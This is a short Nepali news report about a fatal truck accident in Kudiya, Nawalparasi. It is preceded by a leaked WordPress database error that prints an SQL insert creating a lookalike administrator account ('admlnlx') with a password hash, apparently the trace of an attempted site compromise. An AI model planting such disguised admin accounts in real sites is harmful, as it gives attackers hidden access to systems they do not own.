WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BD7u4XeAYHTPCgFC6SqBhPhP4LLomw/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-05 01:20:09', '', 'admlnlx', 'admlnlx')
सहबान अन्सारी,
नवलपरासी, पुस १८–
नवलपरासीको कुडीयामा ट्रकको ठक्करबाट एक जनाको मृत्यु भएको छ।
कुडियाको फेनहरा–३ भित्री सडक खण्ड अन्तर्गत बागमती चिनिमिलबाट प्रतापपुर तर्फ आउदै गरेको ना ३ ख ४७४८ नम्बरको ट्रकले सोही दिशाबाट आउदै गरेको पैदल यात्री कुडिया ३ फेनहरा बस्ने ६५ वर्षीय चन्दन पुरीको मृत्यु भएको हो ।
ट्रकको ठक्करबाट गम्भीर घाईते भएका पुरीलाई उपचारको लागि सहिद स्मृति समुदायिक अस्पताल चौपता पठाउँदा थप उपचार हुन नकसेपछि थप उपचारको लागि भरतपुर मेडिकल कलेज चितवन पठाईएको थियो । उनको उपचारको क्रममा मृत्यु भएको ईलाका प्रहरी कार्यालय बेलाटारीले जनाएको छ।
ट्रक र चालक प्रहरीको नियन्त्रणमा रहेको छ ।